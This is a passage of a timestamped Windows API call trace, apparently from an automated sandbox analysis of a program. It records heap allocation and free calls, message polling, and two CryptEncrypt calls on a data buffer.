lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0188.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0188.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0188.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0188.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0188.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0188.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0188.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0188.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0188.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0188.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0188.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0188.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0188.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0188.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0188.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0188.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0110 | out: hHeap=0x25c0000) returned 1 [0188.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0188.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0188.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0188.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0188.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0188.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0188.358] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0188.358] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x34aa4c0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0188.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0188.358] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0188.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0188.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0188.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0188.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0188.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0150 | out: hHeap=0x25c0000) returned 1 [0188.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0160 | out: hHeap=0x25c0000) returned 1 [0188.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0188.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0188.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0188.358] CryptEncrypt (in: hKey=0xaa5860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x911e, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x9120) returned 1 [0188.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0188.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0188.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0188.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0188.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0188.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0188.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0188.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0188.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0188.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0188.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0188.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0188.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0188.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0188.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0188.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0188.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0188.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0188.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0188.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0188.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0188.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0188.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0188.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0188.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0188.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0188.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0188.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0188.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0188.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0188.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0188.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0188.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0188.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0188.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0188.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0188.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0188.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0188.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0188.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0188.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0188.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0188.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0188.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0188.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0188.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0188.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0188.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0188.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0188.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0188.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0188.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0188.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0188.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0188.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0188.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0188.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0188.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0188.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0188.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0188.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0188.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0188.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0188.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0110 | out: hHeap=0x25c0000) returned 1 [0188.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0188.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0188.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0188.361] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0188.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0188.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0188.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0188.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0188.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0188.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0188.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0188.362] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.362] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0188.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0188.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0188.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0188.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0188.362] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0188.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0188.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0188.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0188.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0188.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0188.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0188.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0188.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0110 [0188.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0188.363] CharLowerBuffW (in: lpsz="byte[37152]", cchLength=0xb | out: lpsz="byte[37152]") returned 0xb [0188.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0188.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0188.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0188.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0188.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0188.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0188.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0100 [0188.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0188.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0188.363] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0188.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0188.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0188.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0188.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0188.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0188.365] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0188.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0188.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0188.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0188.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0188.366] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0188.366] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0188.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0188.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0188.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0188.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0188.366] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0188.366] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.366] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0188.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0188.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0188.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0188.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0188.367] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0188.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0188.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0100 [0188.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0188.367] CryptEncrypt (in: hKey=0xaa5860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34b2250*, pdwDataLen=0x8bef68*=0x911e, dwBufLen=0x9120 | out: pbData=0x34b2250*, pdwDataLen=0x8bef68*=0x9120) returned 1 [0188.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0188.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0188.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01a0 [0188.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0188.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0188.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0188.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0190 [0188.368] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0188.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0188.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0188.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0188.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0188.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0160 [0188.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0188.368] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.368] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0188.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0188.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0188.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0188.368] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0188.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0188.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0188.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0188.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0188.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0188.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0188.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0188.370] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0188.370] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0188.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.370] 